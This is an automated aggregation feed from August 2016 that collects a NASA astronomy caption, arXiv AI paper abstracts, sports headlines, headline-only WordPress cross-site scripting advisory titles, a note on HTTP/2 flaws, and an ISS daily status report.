What if you climbed up on a rock and discovered the Universe? You can. Although others have noted much of it before, you can locate for yourself stars, planets, and even the plane of our Milky Way Galaxy. All you need is a dark clear sky -- the rock is optional. If you have a camera, you can further image faint nebulas, galaxies, and long filaments of interstellar dust. If you can process digital images, you can bring out faint features, highlight specific colors, and merge foreground and background images. In fact, an industrious astrophotographer has done all of these to create the presented picture. All of the component images were taken early last month on the same night within a few meters of each other. The picturesque setting was Sand Beach in Stonington, Maine, USA with the camera pointed south over Penobscot Bay. via NASA http://ift.tt/2aPLnOx

anonymous-sums

anonymous-sums. Anonymous sum types http://www.github.com/massysett/anonymous-sums. Version on this page: 0.4.0.0. LTS Haskell 6.10: 0.4.0.0.

from Google Alert - anonymous https://www.google.com/url?rct=j&sa=t&url=https://www.stackage.org/nightly-2016-08-02/package/anonymous-sums-0.4.0.0&ct=ga&cd=CAIyGjgxMzAxNTQ0ZWE3M2NhMmQ6Y29tOmVuOlVT&usg=AFQjCNEFvaV5V0Nz2HT8Ia-gGbbK65amcQ
via IFTTT

Wednesday, August 3, 2016

Crime Stoppers Gets $2000 to Support Anonymous Tip-Line

NewsChannel 20 and Green Family stores is donating $2000 to Crime Stoppers of Sangamon and Menard Counties. Crime Stoppers will be using the ...

from Google Alert - anonymous http://ift.tt/2b45SmW
via IFTTT

Proceedings of the 2016 Workshop on Semantic Spaces at the Intersection of NLP, Physics and Cognitive Science. (arXiv:1608.01018v1 [cs.CL])

This volume contains the Proceedings of the 2016 Workshop on Semantic Spaces at the Intersection of NLP, Physics and Cognitive Science (SLPCS 2016), which was held on the 11th of June at the University of Strathclyde, Glasgow, and was co-located with Quantum Physics and Logic (QPL 2016). Exploiting the common ground provided by the concept of a vector space, the workshop brought together researchers working at the intersection of Natural Language Processing (NLP), cognitive science, and physics, offering them an appropriate forum for presenting their uniquely motivated work and ideas. The interplay between these three disciplines inspired theoretically motivated approaches to the understanding of how word meanings interact with each other in sentences and discourse, how diagrammatic reasoning depicts and simplifies this interaction, how language models are determined by input from the world, and how word and sentence meanings interact logically. This first edition of the workshop consisted of three invited talks from distinguished speakers (Hans Briegel, Peter Gärdenfors, Dominic Widdows) and eight presentations of selected contributed papers. Each submission was refereed by at least three members of the Programme Committee, who delivered detailed and insightful comments and suggestions.



from cs.AI updates on arXiv.org http://ift.tt/2ausOvJ
via IFTTT

Empirical Evaluation of Real World Tournaments. (arXiv:1608.01039v1 [cs.GT])

Computational Social Choice (ComSoc) is a rapidly developing field at the intersection of computer science, economics, social choice, and political science. The study of tournaments is fundamental to ComSoc and many results have been published about tournament solution sets and reasoning in tournaments. Theoretical results in ComSoc tend to be worst case and tell us little about performance in practice. To this end we detail some experiments on tournaments using real world data from soccer and tennis. We make three main contributions to the understanding of tournaments using real world data from English Premier League, the German Bundesliga, and the ATP World Tour: (1) we find that the NP-hard question of finding a seeding for which a given team can win a tournament is easily solvable in real world instances, (2) using detailed and principled methodology from statistical physics we show that our real world data obeys a log-normal distribution; and (3) leveraging our log-normal distribution result and using robust statistical methods, we show that the popular Condorcet Random (CR) tournament model does not generate realistic tournament data.



from cs.AI updates on arXiv.org http://ift.tt/2autAZO
via IFTTT

Generation of Near-Optimal Solutions Using ILP-Guided Sampling. (arXiv:1608.01093v1 [cs.AI])

Our interest in this paper is in optimisation problems that are intractable to solve by direct numerical optimisation, but nevertheless have significant amounts of relevant domain-specific knowledge. The category of heuristic search techniques known as estimation of distribution algorithms (EDAs) seek to incrementally sample from probability distributions in which optimal (or near-optimal) solutions have increasingly higher probabilities. Can we use domain knowledge to assist the estimation of these distributions? To answer this in the affirmative, we need: (a) a general-purpose technique for the incorporation of domain knowledge when constructing models for optimal values; and (b) a way of using these models to generate new data samples. Here we investigate a combination of the use of Inductive Logic Programming (ILP) for (a), and standard logic-programming machinery to generate new samples for (b). Specifically, on each iteration of distribution estimation, an ILP engine is used to construct a model for good solutions. The resulting theory is then used to guide the generation of new data instances, which are now restricted to those derivable using the ILP model in conjunction with the background knowledge. We demonstrate the approach on two optimisation problems (predicting optimal depth-of-win for the KRK endgame, and job-shop scheduling). Our results are promising: (a) On each iteration of distribution estimation, samples obtained with an ILP theory have a substantially greater proportion of good solutions than samples without a theory; and (b) On termination of distribution estimation, samples obtained with an ILP theory contain more near-optimal samples than samples without a theory. Taken together, these results suggest that the use of ILP-constructed theories could be a useful technique for incorporating complex domain-knowledge into estimation distribution procedures.



from cs.AI updates on arXiv.org http://ift.tt/2aRB1O9
via IFTTT

Autonomous Grounding of Visual Field Experience through Sensorimotor Prediction. (arXiv:1608.01127v1 [cs.RO])

In a developmental framework, autonomous robots need to explore the world and learn how to interact with it. Without an a priori model of the system, this opens the challenging problem of having robots master their interface with the world: how to perceive their environment using their sensors, and how to act in it using their motors. The sensorimotor approach of perception claims that a naive agent can learn to master this interface by capturing regularities in the way its actions transform its sensory inputs. In this paper, we apply such an approach to the discovery and mastery of the visual field associated with a visual sensor. A computational model is formalized and applied to a simulated system to illustrate the approach.



from cs.AI updates on arXiv.org http://ift.tt/2ausIEx
via IFTTT

A Novel Approach for Data-Driven Automatic Site Recommendation and Selection. (arXiv:1608.01212v1 [cs.AI])

This paper presents a novel, generic, and automatic method for data-driven site selection. Site selection is one of the most crucial and important decisions made by any company. Such a decision depends on various factors of sites, including socio-economic, geographical, ecological, as well as specific requirements of companies. The existing approaches for site selection (commonly used by economists) are manual, subjective, and not scalable, especially to Big Data. The presented method for site selection is robust, efficient, scalable, and is capable of handling challenges emerging in Big Data. To assess the effectiveness of the presented method, it is evaluated on real data (collected from Federal Statistical Office of Germany) of around 200 influencing factors which are considered by economists for site selection of Supermarkets in Germany (Lidl, EDEKA, and NP). Evaluation results show that there is a big overlap (86.4%) between the sites of existing supermarkets and the sites recommended by the presented method. In addition, the method also recommends many sites (328) for supermarket where a store should be opened.



from cs.AI updates on arXiv.org http://ift.tt/2aRBqjv
via IFTTT

Learning to Rank for Synthesizing Planning Heuristics. (arXiv:1608.01302v1 [cs.AI])

We investigate learning heuristics for domain-specific planning. Prior work framed learning a heuristic as an ordinary regression problem. However, in a greedy best-first search, the ordering of states induced by a heuristic is more indicative of the resulting planner's performance than mean squared error. Thus, we instead frame learning a heuristic as a learning to rank problem which we solve using a RankSVM formulation. Additionally, we introduce new methods for computing features that capture temporal interactions in an approximate plan. Our experiments on recent International Planning Competition problems show that the RankSVM learned heuristics outperform both the original heuristics and heuristics learned through ordinary regression.



from cs.AI updates on arXiv.org http://ift.tt/2autsJS
via IFTTT

In Love With a Robot: the Dawn of Machine-To-Machine Marketing. (arXiv:1302.4475v3 [cs.AI] UPDATED)

The article looks at mass market artificial intelligence tools in the context of their ever-growing sophistication, availability and market penetration. The subject is especially relevant today for these exact reasons - if a few years ago AI was the subject of high tech research and science fiction novels, today, we increasingly rely on cloud robotics to cater to our daily needs - to trade stock, predict weather, manage diaries, find friends and buy presents online.



from cs.AI updates on arXiv.org http://ift.tt/Y4TTd5
via IFTTT

A Stochastic Temporal Model of Polyphonic MIDI Performance with Ornaments. (arXiv:1404.2314v2 [cs.AI] UPDATED)

We study indeterminacies in realization of ornaments and how they can be incorporated in a stochastic performance model applicable for music information processing such as score-performance matching. We point out the importance of temporal information, and propose a hidden Markov model which describes it explicitly and represents ornaments with several state types. Following a review of the indeterminacies, they are carefully incorporated into the model through its topology and parameters, and the state construction for quite general polyphonic scores is explained in detail. By analyzing piano performance data, we find significant overlaps in inter-onset-interval distributions of chordal notes, ornaments, and inter-chord events, and the data is used to determine details of the model. The model is applied for score following and offline score-performance matching, yielding highly accurate matching for performances with many ornaments and relatively frequent errors, repeats, and skips.



from cs.AI updates on arXiv.org http://ift.tt/OFQwbf
via IFTTT

Probabilistic Reasoning via Deep Learning: Neural Association Models. (arXiv:1603.07704v2 [cs.AI] UPDATED)

In this paper, we propose a new deep learning approach, called neural association model (NAM), for probabilistic reasoning in artificial intelligence. We propose to use neural networks to model association between any two events in a domain. Neural networks take one event as input and compute a conditional probability of the other event to model how likely these two events are to be associated. The actual meaning of the conditional probabilities varies between applications and depends on how the models are trained. In this work, as two case studies, we have investigated two NAM structures, namely deep neural networks (DNN) and relation-modulated neural nets (RMNN), on several probabilistic reasoning tasks in AI, including recognizing textual entailment, triple classification in multi-relational knowledge bases and commonsense reasoning. Experimental results on several popular datasets derived from WordNet, FreeBase and ConceptNet have all demonstrated that both DNNs and RMNNs perform equally well and they can significantly outperform the conventional methods available for these reasoning tasks. Moreover, compared with DNNs, RMNNs are superior in knowledge transfer, where a pre-trained model can be quickly extended to an unseen relation after observing only a few training samples. To further prove the effectiveness of the proposed models, in this work, we have applied NAMs to solving challenging Winograd Schema (WS) problems. Experiments conducted on a set of WS problems prove that the proposed models have the potential for commonsense reasoning.



from cs.AI updates on arXiv.org http://ift.tt/1UPn4hD
via IFTTT

Track

3 Aug 2016 - 19:38, node/12573/track, Anonymous (not verified), details ... 3 Aug 2016 - 18:27, http://ift.tt/1JEPCAV, Anonymous (not ...

from Google Alert - anonymous http://ift.tt/2avzbwV
via IFTTT

[FD] Cross-Site Scripting in WordPress Landing Pages Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Scripting in Activity Log WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Scripting vulnerability in search function Activity Log WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

4 Flaws hit HTTP/2 Protocol that could allow Hackers to Disrupt Servers

If you think that the HTTP/2 protocol is more secure than the standard HTTP (Hypertext Transfer Protocol), then you might be wrong, as it took researchers just four months to discover four flaws in the HTTP/2 protocol. HTTP/2 was launched properly just in May last year after Google bundled its SPDY project into HTTP/2 in February in an effort to speed up the loading of web pages as well as


from The Hacker News http://ift.tt/2atPkVO
via IFTTT

SportsCenter Video: Buster Olney says P Dylan Bundy (7 K, 1 H on Tuesday) has "ability to put the Orioles over the top" (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Ravens: John Harbaugh says recently waived RB Trent Richardson "definitely on our radar" to rejoin the team in future (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Ravens: RB Terrance West sits No. 3 on depth chart, but has been the No. 1 playmaker in camp so far - Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

I have a new follower on Twitter


Netuitive
Full stack #monitoring powered by machine learning & #analytics for cloud infrastructure, apps & services #devops #AWS Free trial at https://t.co/TtaSrnw9m3
Reston, Va.
http://t.co/HUDJScHzFL
Following: 1622 - Followers: 1820

August 03, 2016 at 09:40AM via Twitter http://twitter.com/Netuitive

ISS Daily Summary Report – 08/02/2016

Fluid Shifts Imaging with Chibis in the Service Module (SM): With assistance from the ground team two crewmembers began the second week of the Fluid Shifts experiment run by configuring the Ultrasound 2 hardware prior to performing ultrasound scans on in the SM while using the Chibis.  Poor video quality of the Ultrasound scan for the first crewmember only allowed 50% of the test points to be completed.  Operations for the second crewmember were deferred to allow ground teams to troubleshoot.  Two simultaneous issues were found:  an encoder misconfiguration issue and a loose cable onboard.  A reboot of the encoder by ground teams and adjustment of the cable by the crew resolved the problem.  Fluid Shifts operations will resume tomorrow and today’s activities will be rescheduled.  The Fluids Shift investigation is divided into three segments: Dilution Measures, Baseline Imaging, and Baseline Imaging using the Russian Chibis Lower Body Negative Pressure (LBNP) device. The experiment measures how much fluid shifts from the lower body to the upper body, in or out of cells and blood vessels, and determines the impact these shifts have on fluid pressure in the head, changes in vision and eye structures.  Frozen in Time, Jeff Williams and MELFI: Ten years ago today, then Flight Engineer Jeff Williams placed the first science samples into the Minus Eighty Degree Laboratory Freezer for the International Space Station (MELFI) Flight Unit 1 (FU1) in the U.S. Laboratory/Destiny during Expedition 13.  MELFI is a cold storage unit that maintains experiment samples at temperatures ranging from just above freezing to ultra-cold.  Expedition 13 was the beginning of many years of science collaboration between Williams and MELFI.  Williams arrived at the ISS on April 1, 2006, and the MELFI FU1 arrived on July 6 of the same year.  Jeff then activated MELFI for the first time on July 19.  
As Flight Engineer during Expedition 21, Williams performed maintenance on MELFI by replacing a failed Electronics Unit.  Now, as commander of Expedition 48, he is using all three MELFI flight units onboard ISS to further the science goals of ISS.  Over the last ten years, Williams and MELFI have provided a wide range of support to life science experiments and enhanced research capabilities on the ISS.  To say the least, Jeff has had an interesting 10 year history with MELFI.  Mouse Epigenetics Cage Unit Maintenance: The crew performed maintenance activities for the Mouse Epigenetics Habitat Cage Units by transferring the mice from one habitat cage unit to another and refilling the cage units with water. The Mouse Epigenetics investigation studies altered gene expression patterns in the organs of male mice that spend one month in space, and also examines changes in the deoxyribonucleic acid (DNA) of their offspring. Results from the investigation identify genetic alterations that happen after exposure to the microgravity environment of space. Fine Motor Skills: A series of interactive tasks on a touchscreen tablet were completed for the Fine Motor Skills investigation. This investigation is critical during long-duration space missions, particularly those skills needed to interact with technologies required in next-generation space vehicles, spacesuits, and habitats. The crewmember’s fine motor skills are also necessary for performing tasks in transit or on a planetary surface, such as information access, just-in-time training, subsystem maintenance, and medical treatment.  Habitability Human Factors Directed Observations: The crew recorded and submitted a walk-through video documenting observations of life onboard ISS, providing insight related to human factors and habitability. The Habitability investigation collects observations about the relationship between crew members and their environment on the ISS. 
Observations can help spacecraft designers understand how much habitable volume is required, and whether a mission’s duration impacts how much space crew members need. NanoRacks (NR) Plate Reader 2 Module-29 Test Plate Removal: Following last week’s analysis of the NanoRacks Module-29 (NanoRacks-Fluorescent Polarization in Microgravity) test plates, today the crew removed the fifth test plate from the sample tray and discarded all NR Module 29 hardware. The analysis was performed by sequentially inserting and removing five individual NR Module -29 test plates to and from the sample tray which allows scientists to study chemical reactions using fluorescence polarization which produces changes in light when molecules bind together. This technique enables researchers to measure the interactions of proteins with deoxyribonucleic acid (DNA), or antibodies, and many other biomedical functions. NanoRacks Module -29 validates a commercial Plate Reader instrument that detects changes in light for these types of reactions in a multiwell plate, a flat plate with 384 wells or tiny test tubes, to examine microgravity’s effect on fluorescent polarization, which paves the way for advanced biology research and drug development in space. Microgravity Experiment Research Locker/INcubator-5 (MERLIN 5) Transfer to Expedite the Processing of Experiments to Space Station (EXPRESS) Rack 5 (ER5): The MERLIN-5 was removed from ER7 and installed in ER5 to support samples for the Heart Cells investigation returning on SpX-9.  ER7 has a failed power control module, which prevents the MERLIN from being powered on.  Moving it to ER5 will allow MERLIN to be powered on in time to support the SpaceX-9 return.  The MERLIN provides a single middeck locker EXPRESS Rack compatible freezer/refrigerator or incubator that can be used for a variety of experiments. 
Extravehicular Activity (EVA) Preparation: In preparation for US EVA #35 currently scheduled for August 19, the crew inspected Retractable Equipment Tethers (RETs) for damaged cords. Each RET cord must be inspected prior to EVA use, then stowed in a protective bag to prevent potential damage.  On Board Training (OBT) ISS Emergency Simulation: Following yesterday’s training review covering depress, ammonia, US fire and Russian Segment fire events, today all crew members, with support from ground teams, completed a training exercise with the following objectives: Practice ISS emergency response with crew and ground roles based on information provided by simulator displays. Physically translate through ISS to the appropriate response locations to visualize the use of Station equipment and interfaces. Practice procedure execution and associated decision making based on cues provided by simulator. Practice communication and coordination with […]

from ISS On-Orbit Status Report http://ift.tt/2aMQvBy
via IFTTT